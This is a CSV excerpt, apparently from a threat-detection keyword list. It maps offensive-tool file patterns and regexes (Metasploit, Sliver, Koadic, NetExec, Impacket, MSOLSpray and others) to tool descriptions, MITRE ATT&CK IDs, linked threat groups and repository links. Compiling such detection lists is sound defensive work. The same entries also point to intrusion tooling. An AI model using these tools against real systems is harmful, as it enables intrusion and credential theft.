"*/MS15-034.nse*",".{0,1000}\/MS15\-034\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","8917"
"*/ms17-010.py*",".{0,1000}\/ms17\-010\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8918"
"*/msf.go",".{0,1000}\/msf\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","8919"
"*/msf.swf*",".{0,1000}\/msf\.swf.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8920"
"*/msfcrawler*",".{0,1000}\/msfcrawler.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8921"
"*/msfnonstaged.exe*",".{0,1000}\/msfnonstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8922"
"*/msfpc.sh*",".{0,1000}\/msfpc\.sh.{0,1000}","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","N/A","10","1261","274","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z","8923"
"*/msfremove.ps1*",".{0,1000}\/msfremove\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8924"
"*/msfstaged.exe*",".{0,1000}\/msfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8925"
"*/msftest/*",".{0,1000}\/msftest\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8926"
"*/msfupdate.bat*",".{0,1000}\/msfupdate\.bat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8927"
"*/msfupdate.ps1*",".{0,1000}\/msfupdate\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","8928"
"*/msfvenom.bat*",".{0,1000}\/msfvenom\.bat.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8929"
"*/msfvenom/*",".{0,1000}\/msfvenom\/.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8930"
"*/msf-ws.log*",".{0,1000}\/msf\-ws\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#logfile #linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8931"
"*/msfws.py*",".{0,1000}\/msfws\.py.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","8932"
"*/MsgKitTestTool/*",".{0,1000}\/MsgKitTestTool\/.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","N/A","2","161","41","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z","8933"
"*/Mshikaki.git*",".{0,1000}\/Mshikaki\.git.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","8934"
"*/mshta.cmd*",".{0,1000}\/mshta\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8935"
"*/mshtajs.cmd*",".{0,1000}\/mshtajs\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8936"
"*/msi_search.ps1*",".{0,1000}\/msi_search\.ps1.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","8937"
"*/msi-search.git*",".{0,1000}\/msi\-search\.git.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","8938"
"*/msLDAPDump*",".{0,1000}\/msLDAPDump.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","8939"
"*/msol.py*",".{0,1000}\/msol\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8940"
"*/MSOLSpray*",".{0,1000}\/MSOLSpray.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","1","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","8941"
"*/msrpc-enum.nse*",".{0,1000}\/msrpc\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8942"
"*/MSSprinkler.git*",".{0,1000}\/MSSprinkler\.git.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","1","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","8943"
"*/mssprinkler.ps1*",".{0,1000}\/mssprinkler\.ps1.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","1","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","8944"
"*/mssql_priv.py*",".{0,1000}\/mssql_priv\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8945"
"*/ms-sql-brute.nse*",".{0,1000}\/ms\-sql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8946"
"*/mssqlclient.py*",".{0,1000}\/mssqlclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8947"
"*/ms-sql-config.nse*",".{0,1000}\/ms\-sql\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8948"
"*/ms-sql-dac.nse*",".{0,1000}\/ms\-sql\-dac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8949"
"*/ms-sql-dump-hashes.nse*",".{0,1000}\/ms\-sql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8950"
"*/ms-sql-empty-password.nse*",".{0,1000}\/ms\-sql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8951"
"*/mssqlexec.py*",".{0,1000}\/mssqlexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","8952"
"*/ms-sql-hasdbaccess.nse*",".{0,1000}\/ms\-sql\-hasdbaccess\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8953"
"*/ms-sql-info.nse*",".{0,1000}\/ms\-sql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8954"
"*/mssqlinstance.py*",".{0,1000}\/mssqlinstance\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8955"
"*/ms-sql-ntlm-info.nse*",".{0,1000}\/ms\-sql\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8956"
"*/mssqlproxy.git*",".{0,1000}\/mssqlproxy\.git.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","8957"
"*/ms-sql-query.nse*",".{0,1000}\/ms\-sql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8958"
"*/ms-sql-tables.nse*",".{0,1000}\/ms\-sql\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8959"
"*/ms-sql-xp-cmdshell.nse*",".{0,1000}\/ms\-sql\-xp\-cmdshell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8960"
